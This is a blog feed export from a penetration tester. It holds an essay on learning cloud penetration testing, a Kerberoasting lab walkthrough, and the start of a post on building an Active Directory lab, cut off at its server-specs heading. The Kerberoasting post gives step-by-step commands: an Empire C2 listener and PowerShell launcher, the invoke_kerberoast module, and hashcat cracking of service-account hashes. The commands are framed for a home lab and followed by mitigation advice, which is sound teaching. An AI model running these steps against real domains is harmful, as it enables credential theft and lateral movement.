tag:blogger.com,1999:blog-58905679846724912442024-03-17T23:03:54.145-04:00SethSecSeth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.comBlogger26125tag:blogger.com,1999:blog-5890567984672491244.post-69520395141427380372022-12-15T21:10:00.010-05:002022-12-16T23:02:48.464-05:00Cloud penetration testing: Not your typical internal penetration test<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV7zzj2x4zFuTNn8sU7Ga8kebQweNcDEMYedfrPMI3UNaOQ1NeC1oiXCfDonCK6sqHk5hdHnoNSpYFX2RFsIbzdR2fqj1hqlM_nypfF91QlE3wsnlOirJ5IDzVd1XjynglKLzjzfhlqIrqL6h9WDzVlJQaBD4KiiN60EhT73uO8Yi-FbQKJ3LyuWtew/s1195/Screenshot%202022-12-15%20at%207.22.06%20PM.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="692" data-original-width="1195" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXV7zzj2x4zFuTNn8sU7Ga8kebQweNcDEMYedfrPMI3UNaOQ1NeC1oiXCfDonCK6sqHk5hdHnoNSpYFX2RFsIbzdR2fqj1hqlM_nypfF91QlE3wsnlOirJ5IDzVd1XjynglKLzjzfhlqIrqL6h9WDzVlJQaBD4KiiN60EhT73uO8Yi-FbQKJ3LyuWtew/w640-h370/Screenshot%202022-12-15%20at%207.22.06%20PM.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p style="text-align: left;">There seems to be a common path for experienced penetration testers who are thrown into the world of cloud penetration testing. I'm talking about internal (aka assumed breach) tests, where the goal is to demonstrate the impact of a compromised user with access to the cloud or a compromised application in the cloud. </p><p style="text-align: left;">The path usually starts with ignorance, is followed by total confusion and questioning everything you know about penetration testing, and ends with… well, it never ends. Why? Because the cloud providers and the cloud native technologies running in these clouds keep evolving at a remarkable rate. There's always more to learn and more attack paths waiting to be found.</p><p style="text-align: left;">I hope walking through my own path and defining the stages of ignorance and awareness I encountered in a playful way might help others progress through the early stages more quickly than I did. </p><h2 style="text-align: left;">Level 1: This is just like any other Internal Penetration Test, right?</h2><p>You connect to your assumed breach starting point within the internal cloud network: something like Kali running on an EC2 instance. You run <i>nmap</i> against the VPC’s internal /16 and hope for the best. You quickly realize there might be a better way to do this. </p><h2 style="text-align: left;">Level 2: You get your first spark of harnessing cloud magic </h2><p>You realize if you ask for and receive IAM credentials for the target environment, you can use those cloud credentials and the AWS API to enumerate the IP addresses of all the EC2 instances in the account, and then <i>nmap</i> only those IP addresses. You pat yourself on the back and think you might actually be a cloud security expert now. Unfortunately, you still think that the scope of the cloud attack surface is limited to the services running on EC2. Such a level 2 move. </p><h2 style="text-align: left;">Level 3: Woah. There is more than just EC2!?!</h2><p>You realize if you have Route53 access, you can enumerate all of the A records in AWS managed DNS zones, and this makes you very happy. Lots of new attack surface area. You start to find things hosted by other services, like Kubernetes, ECS, API Gateway, ELB, etc. You might not yet realize what Kubernetes, ECS, API Gateway, and ELB do yet, but that's OK at level 3. The important thing is that you have more things to hack. Go find those services with default credentials, SSRF vulns, missing authentication, etc., and have some fun!</p><h2 style="text-align: left;">Level 4: You become woke to IAM PrivEsc</h2><p>You start to learn about what IAM is and how it can be misconfigured. You learn about IAM privilege escalation. You exploit the <i>ec2:RunInstance</i> + <i>iam:PassRole</i> attack path and gain administrative access to the AWS account. Or, you pop a service and realize that service has an IAM role that can assume other IAM roles. You realize, like all of those before you, that Spencer Gietzen was a really smart dude who shared a ton of amazing info with the community, and you get hungry to learn more about IAM privesc. You should probably check out <a href="https://bishopfox.com/blog/aws-iam-privilege-escalation-playground">IAM Vulnerable</a> at this point.</p><h2 style="text-align: left;">Level 5: A secret in the wrong place can be pretty bad</h2><p>You start to look at other key AWS services like S3, Lambda, ECR, EKS, CloudFormation and you start to see patterns that lead to other (non-IAM) types of privilege escalation: A secret stored in the wrong place (S3 bucket object, Kubernetes secret, Lambda environment variable, EC2 user-data, etc.) can provide unintended privilege escalation opportunities. It reminds you of finding passwords in powershell scripts accessible via SMB shares and you get nostalgic. </p><h2 style="text-align: left;">Level 6: You start to think in graphs, and even work backwards </h2><p>You are now always looking for secrets, vulnerable software, and misconfigured IAM policies in the environment. But when you find these, you now work backward and focus on <b>who</b> has access to that secret/vuln software/IAM policy, and you build and execute attack paths that demonstrate that user X has paths to the penetration test trophy targets. You also realize there can be relationships between AWS accounts, like how multiple Active Directory domains can be connected in a single forest. You look for ways that access from a lower-trust account can be used to gain access to the higher-trust accounts (e.g., role trusts) and your attack chains become even more impactful. </p><h2 style="text-align: left;">Level 7: CI/CD Tooling is a freaking gold mine </h2>You're testing ACME corp, an organization that is fairly mature from a security perspective. Nobody has <i>write</i> permissions to the production cloud environments except for the Ops team and the automated deployment tooling. But, you realize all of the developers DO have access to the continuous deployment tooling, and as it turns out RBAC is not enforced here. You realize this means all developers have access to all of the secrets in the CI/CD tooling software, so you grab the admin creds to the production cloud environment, complete the assessment objectives, and do a victory dance. You file this in the "things I always need to look for" category. It rarely disappoints. <h2>Level 8: You start to think tech monopolies are a good thing</h2><div>Your feeling really good about cloud security these days. (You can tell that I personally have spent the most time on AWS, but your journey might start with GCP, Azure, or even one of the others.) But eventually, you'll need to run a penetration test in another one of the public clouds, and you very quickly notice there are really big differences between them. You start to pine for the ubiquity of Active Directory. You take solace in the fact that at least half of your cloud penetration testing methodology is cloud agnostic and applies to all cloud providers. But you get sad every time you have to start over and learn the ins and outs of a new cloud provider. On that note, you also get a little sad when you have to context switch to a cloud provider you have not seen in awhile. </div><h2 style="text-align: left;">Level 9: I know nothing about the cloud</h2><div style="text-align: left;">The more you learn about cloud penetration testing, the more confident you are that you don’t know anything about the cloud. You've learned that the attack surface area of each organization depends entirely on the specific services that the target organization uses, how the org deploys those services, how all of the services interact with each other, and how they interact with third-party services. In other words, you know the general approaches you need to take, but are resigned to the fact that you will be learning new cloud services and new cloud native technologies for the foreseeable future. </div><div style="text-align: left;"><h2 style="text-align: left;">Honorable mentions:</h2></div><div style="text-align: left;"><ul style="text-align: left;"><li>Why isn't Responder working as expected in the cloud?</li><li>Hey Google: "What is cloud native?", "What is serverless?", and "What is Kubernetes?"</li><li>Azure Active Directory is Azure's managed Active Directory, right? RIGHT!?</li></ul></div><div style="text-align: left;">What were some of the "ah-ha" moments in your cloud penetration testing journey?</div><h2 style="text-align: left;">Wrap Up</h2><div style="text-align: left;">If you are interested in learning more about cloud hacking in general, but in an easy to read format, check out this excellent book by Sparc Flow: <a href="https://www.amazon.com/Hack-Like-Ghost-Sparc-Flow/dp/1718501269/" target="_blank">How to Hack like a Ghost</a>. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">If you want an idea of how we perform objective based Cloud Penetration Testing at Bishop Fox, check out <a href="https://bishopfox.com/services/cloud-penetration-testing">this page</a>, or the talk I gave called <a href="https://www.youtube.com/watch?v=ScBgca_zCCo" target="_blank">Penetrating the Cloud: Uncovering Unknown Vulnerabilities</a>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Also, check out <a href="https://github.com/BishopFox/cloudfox" target="_blank">CloudFox</a>, a tool Carlos Vendramini and I created at Bishop Fox to help automate the process of gaining situational awareness in cloud environments. </div><div style="text-align: left;"><br /></div><div style="text-align: left;">Lastly, there are some amazing open source knowledge bases available as well: <br /><ul style="text-align: left;"><li><a href="https://hackingthe.cloud/">https://hackingthe.cloud/</a></li><li><a href="https://cloudsecdocs.com/">https://cloudsecdocs.com/</a></li><li><a href="https://www.secwiki.cloud/">https://www.secwiki.cloud/</a></li><li><a href="https://cloudsecwiki.com/">https://cloudsecwiki.com/</a></li></ul></div><div style="text-align: left;">Happy cloud hacking! If you'd like to chat about cloud security, hit me up on the Cloud Security Forum Slack (sethsec) or on Mastodon @ <a href="https://infosec.exchange/@sethsec">https://infosec.exchange/@sethsec</a>. </div>Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-52359630487134542222017-08-31T12:09:00.001-04:002017-08-31T13:31:51.410-04:00Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them<h2>
TL;DR</h2>
There are a lot of great blogs out there that show you how to Kerberoast. In this post, I'm going to walk through the process of setting up your lab so that you can practice this attack. This involves creating a domain user and then mapping a SPN to that account. After that, I'll walk through using Empire to launch Invoke-Kerberoast, and I'll crack the hashes offline with Hashcat. <br />
<br />
<h2>
Pentest Home Lab Recap</h2>
If you don't already have an Active Directory lab and want to build one so that you can play along, check out my previous posts:<br />
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> </li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
</ul>
<br />
<h2>
The Attack: Kerberoasting</h2>
<h4>
Attack Goals</h4>
Domain privesc & lateral movement. If you have domain credentials and access to the domain, this is a relatively easy way to gain additional access within the domain. If all goes well, you'll end up with new domain credentials that might have administrative access to additional resources.<br />
<br />
<h4>
Attack Prerequisites</h4>
In order to Kerberoast, you either need to have:<br />
<ul>
<li>Interactive access to a domain connected machine (you are logged on)</li>
<li>Remote access to a domain connected machine via Metasploit, Empire, CobaltStrike, etc.</li>
<li>A valid set of domain credentials and be on the network (Impacket, Crackmapexec, etc.)</li>
</ul>
Common ways you get this type of access are:<br />
<ul>
<li>You phished someone</li>
<li>You gained physical access to an unlocked machine</li>
<li>You have network access and performed LLMNR/NBT-NS spoofing with a tool like Responder to get domain credentials</li>
</ul>
<h2>
</h2>
<h2>
</h2>
<h2>
Creating SPNs in your Lab</h2>
Before creating our SPN, lets briefly review what a SPN is, in Microsoft's words:<br />
<div>
<span style="color: #2a2a2a; font-family: "segoe ui" , "lucida grande" , "verdana" , "arial" , "helvetica" , sans-serif;"><span style="font-size: 13px;"><br /></span></span></div>
<div>
<span style="color: #2a2a2a; font-family: "segoe ui" , "lucida grande" , "verdana" , "arial" , "helvetica" , sans-serif; font-size: 13px;">"<i>A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by </i></span><a href="https://msdn.microsoft.com/en-us/library/ms677600(v=vs.85).aspx" style="color: #00709f; font-family: "Segoe UI", "Lucida Grande", Verdana, Arial, Helvetica, sans-serif; font-size: 13px; text-decoration-line: none;"><i>Kerberos authentication</i></a><span style="color: #2a2a2a; font-family: "segoe ui" , "lucida grande" , "verdana" , "arial" , "helvetica" , sans-serif; font-size: 13px;"><i> to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.</i>" </span></div>
Source: <a href="https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx</a><br />
<div>
<br /></div>
<div>
I used to think you needed to install a service like IIS or SQL Server in order to set this up in your lab. Good news: Setting this up in the lab is much easier than that. All you need to do is execute the <i>setspn</i> command as an domain administrator and map a SPN to a valid account. </div>
<br />
<h4>
Step 1 - Create a new domain account for the test</h4>
If using powershell to create the user, you'll need to run this from the domain controller or another machine that has the ActiveDirectory powershell module installed. You'll also need to run this as an domain administrator or another account that has rights to add a new user:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\> </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">New-ADuser -Name "<user_name>" -SamAccountName <user_name> -Enabled $true -AccountPassword(Read-host -AsSecureString "AccountPassword")</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">AccountPassword: </span><span style="color: red; font-family: "courier new" , "courier" , monospace;"><Password here></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-AdnY45K0efw/WZPBBKl6nFI/AAAAAAAABdQ/-PknHdV3ssE7cEz5e7AXncgT1OB3bf-mwCLcBGAs/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="107" data-original-width="836" height="80" src="https://4.bp.blogspot.com/-AdnY45K0efw/WZPBBKl6nFI/AAAAAAAABdQ/-PknHdV3ssE7cEz5e7AXncgT1OB3bf-mwCLcBGAs/s640/1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<h4>
Step 2 - Use setspn to create a SPN and map it to your new account</h4>
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -A <user_name>/<hostname>.<domain>:<port> <user_name></span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-31IydfrO_lk/WZPBF8BVlzI/AAAAAAAABdU/GRDgkd2f-lUq-11CnPgqr85UmsudnGXgACEwYBhgL/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="183" data-original-width="838" height="137" src="https://1.bp.blogspot.com/-31IydfrO_lk/WZPBF8BVlzI/AAAAAAAABdU/GRDgkd2f-lUq-11CnPgqr85UmsudnGXgACEwYBhgL/s640/3.png" width="640" /></a></div>
<br />
<b>Step 3 (Optional) - Verify your SPN was created</b><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -Q */* | findstr <user_name></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Hr9fIT01z4g/WZPDSjyP3MI/AAAAAAAABdg/JaIbt9yEByA06rNK4ob8mYvD11Ov-DIXACLcBGAs/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="88" data-original-width="573" height="97" src="https://2.bp.blogspot.com/-Hr9fIT01z4g/WZPDSjyP3MI/AAAAAAAABdg/JaIbt9yEByA06rNK4ob8mYvD11Ov-DIXACLcBGAs/s640/4.png" width="640" /></a></div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;"><br /></span></span>
That was easier than expected, right? Another lesson I learned along the way: You can create a SPN for a service that does not exist. For instance, you can do this:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">PS C:\></span><span style="font-family: "courier new" , "courier" , monospace;"> </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">setspn -A TEST/test IIS_008</span></span><br />
<br />
TEST/test is not a real service, but IIS_008 is a real user, so the SPN is created and you can now use it to crack IIS_008's password.<br />
<br />
<h2>
Attack Walk through</h2>
<div>
Here are some posts that helped me wrap my head around this attack: </div>
<div>
<br /></div>
<div>
<a href="https://room362.com/post/2016/kerberoast-pt1/">KERBEROASTING - PART 1</a>, <a href="https://room362.com/post/2016/kerberoast-pt2/">Part 2</a>, <a href="https://room362.com/post/2016/kerberoast-pt3/">Part 3</a> - Mubix</div>
<a href="https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/">Kerberoasting Without Mimikatz</a> - harmj0y<br />
<div>
<a href="http://springtime%20kerberoasting/">Springtime Kerberoasting</a></div>
<div>
<a href="https://www.youtube.com/watch?v=PUyhlN-E5MU">Attacking Microsoft Kerberos Kicking the Guard Dog of Hades Tim Medin</a><br />
<div>
<br /></div>
<div>
As you will find in all of those great posts (and many others), there are lots of different tools that you can use to perform the Kerberoast attack. This part has been widely covered, but I still want to include the attack walk-through in this post for completeness. I'll quickly walk the what I consider to be really easy, reliable way to execute this attack in your lab:<br />
<br /></div>
<h4>
Step 1 - Install or update Empire</h4>
<div>
Install: </div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:~# </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">cd /opt/</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt# <span style="color: red;">git clone</span> <span style="color: red;">https://github.com/EmpireProject/Empire.git</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:~# <span style="color: red;">cd /opt/Empire/setup/</span></span></div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire/setup# <span style="color: red;">./install.sh</span></span></div>
</div>
<div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire/setup# <span style="color: red;">cd ..</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">root@Kali-Rolling:/opt/Empire# <span style="color: red;">./empire</span></span></div>
</div>
<div>
<br /></div>
<div>
Updating:<br />
*If you have Empire installed but you have not updated Empire since 8/31/2017, git pull to current. There were some bug fixes and improvements made to the Invoke-Kerberoast module between the 27th and the 31st. You'll likely have to rerun the install script (make a backup first) as there were some major changes in v2.1 that require new dependencies.<br />
<br /></div>
<h4>
Step 2 - Start Empire, generate powershell payload</h4>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">listeners</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners) > <span style="color: red;">uselistener http</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;">info</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">set Host http://<ip>:<port></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="color: red; font-family: "courier new" , "courier" , monospace;">info</span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > </span><span style="font-family: "courier new" , "courier" , monospace;"><span style="color: red;"><span style="color: red;">execute</span></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > <span style="color: red;">launcher powershell</span></span></div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-lyvkWPXFoQM/WZPIka8XodI/AAAAAAAABd8/yhDYnmY0fo8qr6LMBeJgtsq9nEF-Kp7cACLcBGAs/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="490" height="262" src="https://1.bp.blogspot.com/-lyvkWPXFoQM/WZPIka8XodI/AAAAAAAABd8/yhDYnmY0fo8qr6LMBeJgtsq9nEF-Kp7cACLcBGAs/s400/5.png" width="400" /></a></div>
<br />
If you have any questions about setting this up, check out <a href="https://www.powershellempire.com/?page_id=110">https://www.powershellempire.com/?page_id=110</a>, leave a comment here, or both :)<br />
<br /></div>
<h4>
Step 3 - Execute payload on the domain connected victim machine as a low level user</h4>
<div>
1) Log into workstation in the lab as a low level domain user</div>
<div>
2) Execute the powershell command generated by Empire</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-O7kHFFd5jAA/WZPJ6oH0O2I/AAAAAAAABeM/1M_J5ggNX7AGA7ITCpnKBExtHE6C2caTACLcBGAs/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="559" height="175" src="https://1.bp.blogspot.com/-O7kHFFd5jAA/WZPJ6oH0O2I/AAAAAAAABeM/1M_J5ggNX7AGA7ITCpnKBExtHE6C2caTACLcBGAs/s400/7.png" width="400" /></a></div>
<br /></div>
<h4>
Step 4 - Back on your attack box, interact with victim and execute Invoke-Kerberoast</h4>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: listeners/http) > <span style="color: red;">main</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire) > <span style="color: red;">interact <tab complete to find your agent ID></span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: ADY86TPS) > <span style="color: red;">usemodule credentials/invoke_kerberoast</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: powershell/credentials/invoke_kerberoast) > <span style="color: red;">set OutputFormat Hashcat</span></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;">(Empire: powershell/credentials/invoke_kerberoast) > <span style="color: red;">run</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-p56yyKLbtso/WZ_FysoqiII/AAAAAAAABfQ/9Y9FeQB1KfwiI2z_CbPsaPm37Ly6bWHgACLcBGAs/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="484" data-original-width="874" height="354" src="https://4.bp.blogspot.com/-p56yyKLbtso/WZ_FysoqiII/AAAAAAAABfQ/9Y9FeQB1KfwiI2z_CbPsaPm37Ly6bWHgACLcBGAs/s640/10.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br /></div>
<div>
<b>Step 5 - Crack hash with Hashcat</b></div>
<div>
<br />
Copy the hashes that Empire spits out into a text file on your password cracker, and let it rip:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">root@cracker:/opt/hashcat-3.30#</span><span style="font-family: "courier new" , "courier" , monospace;"> .</span><span style="color: red; font-family: "courier new" , "courier" , monospace;">/hashcat64.bin -m 13100 -r rules/<rules_file> <path to hashes file> <path to wordlist></span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Q2Oq_DxdurE/WagdFPJgEQI/AAAAAAAABgQ/JDN0Jj5Lybs7PRPiEx1UMUXyJewUmncrQCLcBGAs/s1600/11a.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="117" data-original-width="637" height="115" src="https://1.bp.blogspot.com/-Q2Oq_DxdurE/WagdFPJgEQI/AAAAAAAABgQ/JDN0Jj5Lybs7PRPiEx1UMUXyJewUmncrQCLcBGAs/s640/11a.png" width="640" /></a></div>
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
And here is a cracked domain account (if you scroll up to the top of that hash on your own machine, you will see the username of the hash you just cracked. </div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-mFk8ju3wCII/WagXZL4CqbI/AAAAAAAABgA/C-ACXKby_ms2U3YPUJKX_1kELvSWFd2YQCLcBGAs/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="370" data-original-width="498" height="296" src="https://3.bp.blogspot.com/-mFk8ju3wCII/WagXZL4CqbI/AAAAAAAABgA/C-ACXKby_ms2U3YPUJKX_1kELvSWFd2YQCLcBGAs/s400/12.png" width="400" /></a></div>
<br />
<h2>
Wrap Up</h2>
</div>
</div>
<div>
You did it. You created a SPN in your active directory lab, you used the Kerberoast attack pull out a password hash, and you cracked the password hash with Hashcat. Feel free to create some more to make the attack feel more realistic. </div>
<div>
<br /></div>
<div>
<b>How does an organization prevent this from happening? </b></div>
<div>
<ul>
<li>Make sure all accounts that have a SPN tied to them (usually service accounts) have a difficult to crack password. Something random and long. </li>
<li>Disable interactive login whenever you can for service accounts. That password doesn't do us nearly as much good if interactive login is disabled and we can't connect to a server with it. </li>
</ul>
</div>
<div>
For a much more detailed remediation and detection recommendations, check out Sean Metcalf's blog post: <a href="https://adsecurity.org/?p=3458">Detecting Kerberoasting Activity</a>, specifically the section: Mitigating Kerberoast Attack Activity</div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com2tag:blogger.com,1999:blog-5890567984672491244.post-55728979988176886672017-06-06T23:50:00.000-04:002017-12-02T22:35:57.257-05:00Pentest Home Lab - 0x2 - Building Your AD Lab on PremisesIn <a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building a virtual corporate domain</a>, we talked about why you would want to build your own AD pentest lab, where you can build it, and the pros and cons of each option.<br />
<br />
In <a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a>, we walked through setting up a fully functional home lab in AWS. <br />
<br />
<div>
In this third installment, I'm going to walk through setting up a pentest active directory home lab in your basement, closet, etc. I'll be using Proxmox VE, an open source virtualization environment (aka hypervisor) similar to Vmware ESXi or Citrix XEN.<br />
<br />
<h2>
The series so far:</h2>
<div>
<ul>
<li><a href="http://sethsec.blogspot.com/2017/05/pentest-home-lab-0x0-building-virtual.html">Pentest Home Lab - 0x0 - Building A Virtual Corporate Domain</a> (This post)</li>
<li><a href="https://sethsec.blogspot.com/2017/05/pentest-home-lab-0x1-building-your-ad.html" target="">Pentest Home Lab - 0x1 - Building Your AD Lab on AWS</a></li>
<li><a href="https://sethsec.blogspot.com/2017/06/pentest-home-lab-0x2-building-your-ad.html" target="">Pentest Home Lab - 0x2 - Building Your AD Lab on Premises using Proxmox VE</a></li>
<li><a href="https://sethsec.blogspot.com/2017/08/pentest-home-lab-0x3-kerberoasting.html">Pentest Home Lab - 0x3 - Kerberoasting: Creating SPNs so you can roast them</a></li>
</ul>
</div>
</div>
<div>
<br />
<h2>
Table of Contents</h2>
<br />
<ul>
<li>What are we going to build?</li>
<li>Example server specs</li>
<li>Let's talk about network placement</li>
<li>Installing the hypervisor (Proxmox VE)</li>
<li>Getting Windows server software</li>
<ul>
<li>Obtaining evaluation version of Windows server</li>
<li>Downloading Windows 10 ISO</li>
</ul>
<li>Transfering ISOs to Proxmox</li>
<li>VM #1: Creating our Server 2012r2 template</li>
<ul>
<li>Configuring a Proxmox VM (Windows server 2012r2)</li>
<li>Installing Windows Server 2012r2</li>
<li>Converting a VM to a template in Proxmox</li>
</ul>
<li>VM #2: Creating your 2012r2 domain controller</li>
<ul>
<li>Creating a new VM by cloning your template</li>
<li>Promoting your first server to a DC</li>
<li>You now have an Active Directory Domain - Add some users</li>
<li>Add at least one admin user to your domain admins group</li>
</ul>
<li>VM #3: Creating your second 2012r2 server</li>
<ul>
<li>Configuring DNS</li>
<li>Adding host to the domain</li>
<li>Adding domain users to the remote desktop group</li>
</ul>
<li>VM #4: Creating our Windows 10 Template</li>
<li>VMs #5 & #6: Creating two Windows 10 VMs from the template</li>
</ul>
</div>
<div>
<br />
<h2>
What are we going to build?</h2>
<div>
At the end of this post, <b>you will have a fully functional AD environment running on ProxmoxVE </b>that you can use to make yourself a better penetration tester. I'm not going to assume you are familiar with ProxmoxVE or setting up Active Directory, so some of this might be review. </div>
<div>
<br /></div>
<div>
You will configure at least 2 virtual machines, most likely more:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/--U4VDrz8iJg/WTIpN7UaocI/AAAAAAAABbw/R2FShj6RKlw20eHrDAwckTUPZx7eyc_igCLcB/s1600/proxmox%2Blab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="249" data-original-width="232" height="320" src="https://3.bp.blogspot.com/--U4VDrz8iJg/WTIpN7UaocI/AAAAAAAABbw/R2FShj6RKlw20eHrDAwckTUPZx7eyc_igCLcB/s320/proxmox%2Blab.png" width="297" /></a></div>
<br /></div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both;">
You will create a Windows 2012r2 domain, promote one server to be a DC, and add additional hosts to the domain:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-MBXHKpY47Hc/WTIqK7XEUaI/AAAAAAAABb0/5myZYrok_Nc9DuaTP1t1WYZ9NjdbWp2ewCLcB/s1600/30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="173" data-original-width="455" height="241" src="https://1.bp.blogspot.com/-MBXHKpY47Hc/WTIqK7XEUaI/AAAAAAAABb0/5myZYrok_Nc9DuaTP1t1WYZ9NjdbWp2ewCLcB/s640/30.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
You will create at least 2 users and 1 administrator account:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-65fcRPgZ9tg/WTIq3w1rCXI/AAAAAAAABb4/OhVRp56LNPsaa8xFWRkzIQUWw2dyjsLHgCLcB/s1600/31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="199" data-original-width="481" height="264" src="https://3.bp.blogspot.com/-65fcRPgZ9tg/WTIq3w1rCXI/AAAAAAAABb4/OhVRp56LNPsaa8xFWRkzIQUWw2dyjsLHgCLcB/s640/31.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
To get started, you really only need a Domain Controller and a Workstation. To be able to test out more stuff, you'll probably end up wanting at least two workstations (User 1's workstation and User 2's workstation), and at least one more non DC server. </div>
<br />
<h2>
Example server specs</h2>
